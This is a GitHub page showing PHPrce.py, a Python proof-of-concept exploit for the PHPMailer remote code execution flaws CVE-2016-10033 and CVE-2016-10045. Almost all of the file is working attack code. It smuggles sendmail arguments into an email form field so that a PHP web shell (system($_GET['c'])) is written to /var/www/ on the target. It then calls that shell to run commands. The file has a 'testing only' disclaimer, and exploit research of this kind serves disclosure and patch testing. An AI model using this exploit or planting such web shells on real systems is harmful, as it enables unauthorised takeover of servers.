-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathPHPrce.py
76 lines (55 loc) · 2.12 KB
/
PHPrce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#!/usr/bin/python
intro = """
PHPMailer RCE PoC Exploits
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
Discovered and Coded by:
Dawid Golunski
@dawid_golunski
https://legalhackers.com
Re-coded by:
Andrea Cappa
@zi0Black (Twitter,Telegram,GitHub)
https://zioblack.xyz (italian only)
"""
usage = """
Usage:
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Disclaimer:
For testing purposes only. Do no harm.
"""
import time
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import socket
import sys
RW_DIR = "/var/www/"
url = '' # Set destination URL here
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
#payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php system($_GET['c']);?>"
PHP_SETTINGS = "phpcode.php?c="
PHP_PAYLOAD = ""
post_fields = {'email': payload, 'subject': 'x', 'text': RCE_PHP_CODE}
# Attack
data = urllib.parse.urlencode(post_fields).encode("utf-8")
req = urllib.request.Request(url, data)
response = urllib.request.urlopen(req)
the_page = response.read()
print("First stage complted! Php shell uploaded :)")
url = url+"/"+PHP_SETTINGS+PHP_PAYLOAD
req = urllib.request.Request(url)
response = urllib.request.urlopen(req)
the_page = response.read()
print("Payload executed: "+PHP_PAYLOAD)